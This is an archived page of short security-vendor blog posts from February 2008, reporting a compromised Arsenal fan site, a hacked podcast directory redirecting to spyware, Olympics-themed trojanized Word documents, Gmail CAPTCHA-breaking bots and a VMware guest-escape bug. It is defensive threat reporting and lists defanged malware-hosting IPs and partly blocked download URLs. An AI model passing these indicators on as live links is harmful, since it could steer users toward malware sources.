Archive for February 28th, 2008
February 28th, 2008 by Jovi Umawing (Technical Communications)
Sports fan sites being compromised by malicious authors is not unheard of. We’ve seen it happen to a Jets fan site in early January this year, and we’re seeing it again in another fan site–this time of Arsenal, a popular English soccer team.
The compromised Web site in this case is Onlinegooner.com, which was reported by ScanSafe OI to be “maliciously active.” STAT confirmed that the fan site had been injected with malicious code, which led to the download of malware from the following IP addresses:
- 61(dot)19(dot)246(dot)58
- 202(dot)83(dot)212(dot)250
- 89(dot)107(dot)104(dot)30
It was observed that the aforementioned addresses were hosted from several parts of the globe, like Thailand, Hong Kong, and Russia. The downloaded malware was found to contain rootkit, keylogging, backdoor, ARP poisoning, and DNS spoofing capabilites — all of which are, admittedly, pretty sophisticated features for a malware.
Onlinegooner.com has been bringing news to Arsenal fans for a decade now, and it was also news that was used to bring malware to fans. As the seeding of malware took place February 18, one motivation for the compromise could have been the then-upcoming Champions League match that the team had against AC Milan. Closely following this event was striker Eduardo da Silva’s injury, which must have also served the malicious users’ purposes in drawing more fans to the site.
February 28th, 2008 by Roderick Ordoñez (Technical Communications)
A site dubbing itself as the world’s largest podcast directory has been compromised! Even Google cautions about visiting the site, warning the user that it “may harm your computer.”
The site, hxxp://www.pod-planet.com, seemingly contains a redirector string, such that a visit to the site’s main page (hxxp://www.pod-planet.com/index.asp) will automatically lead users to http://www.{BLOCKED}e8.com/app/helptop.do, which in turn downloads a malicious file from http://www.{BLOCKED}e8.com/app/wm.exe. Trend Micro detects the downloaded file as TSPY_WOWAR.AG.
Once again playing culprit to this series of redirections is injected code, which has been obviously obfuscated to deter possible analysis. Obfuscation — normally done to protect direct copying of personal code — may actually prove detrimental to a malware (spyware) author in this case, as it may be proof enough that a chunk of illegible characters is present in a fully legitimate site.
Diligence is required of any Webmaster, and indeed much of it is needed in this robust era of Web threats. Such is truly applicable if one plans to call itself as the “largest podcast directory” on the Net, as malware writers are all too eager — and fully capable — to transform this “largest directory” to serve heapings of malicious intent.
February 28th, 2008 by Jake Soriano (Technical Communications)
A stealthier version of Trojanized Microsoft Word documents is recently being sent as attachments to spammed email messages. Seen as another targeted attack, these malicious Word documents seem to be riding on the popularity of the upcoming Olympics in Beijing, China. The attachments have the file name Pasadena.doc.
Trend Micro Research Project Manager Ivan Macalintal compares this recent targeted attack to others before it, and comes up with several conclusions that would worry Internet users. First, he says that coverage of the attack has been relatively low, even by vendors with good Office heuristics. The malicious documents, he adds, has an embedded rootkit, albeit network-only; also, the control channels are obfuscated.
Macalintal believes that these attacks could be part of a bigger targeted malware attack related to the Beijing Olympics. Several news articles reported of protest actions after the Rose Parade in Pasadena featured a float with the China Olympics as theme. The reasons are political and may also concern international relations with the Chinese government.
China, interestingly, also was the subject of another infamous attack using similar Trojanized Word documents last January. Besides the Olympics, this former targeted attack also made references to the ongoing debate regarding Tibet.
February 28th, 2008 by Arman Capili (Technical Communications)
Word has it that spammers have started circumventing the CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) system used by Google’s email service, Gmail. It can be recalled that a similar issue happened with the Windows Live mail service a few weeks back.
The two attacks are pretty similar in terms of using bots to register new email accounts. However, the Gmail attack is considered more complicated since it uses two compromised hosts in its attempts to break into the Google CAPTCHA system. The first host attempts to extract a copy of the CAPTCHA image in bitmap format then attempts to break the code. In case it fails, a second host uses the same image, but breaks it down into segments then sends it as a portable image or graphic file. Segmentation is the only task where humans still outperform bots, but it is steadily gaining attention and focus among spammers and bot herders.
It is apparent in the mechanism above that Google CAPTCHAs are a lot harder to break than those from other email services—and it better be. Gmail provides a very wide window of opportunity for spammers in leveraging Google’s wide range of services for free. The popularity of Google makes it difficult to track spammers among the millions of users across the globe. This further makes Google’s domains highly unlikely to get blacklisted.
Although breaking the Google CAPTCHA is of a very low percentage as of yet, we cannot deny that it works. We can expect more innovations in the future, and far more effective and creative ways of dealing with bots should definitely be in the to-do lists of email service providers as well.
February 28th, 2008 by Macky Cruz (Technical Communications)
VMWare is one of the more popular virtualization software these days. Its home page describes virtualization as a technology bound to change the IT landscape, as it allows one to “transform hardware into software.” By “virtualizing” hardware resources including the CPU, RAM, etc., multiple virtual machines can share resources without interfering with one other. It has thus proven to be a handy tool for intensive security research as well for the creation and use of test environments without harming the actual system.
However, Core Security Technologies has very recently reported of a bug that allows malicious users to escape the virtual environment to actually penetrate the host system running it. The bug exists in the shared folder feature of the Windows client-based virtualization software. VMWare has, for the meantime, advised users to disable shared folders. The company has also made clear that the vulnerability was not present in its server line, and that in newer versions the user must actually turn on the feature to become susceptible to this attack.
VMWare discloses this vulnerability on this page.
Core Security Technologies has a full disclosure on this page. The vulnerability ID for this finding is CVE-2008-0923 at the National Vulnerability Database.
Trend Micro researchers are bent on giving you the freshest information on the latest threats. We are posting our findings in real-time, so please stand by for updates as we uncover more details on this particular threat.
Previous Posts
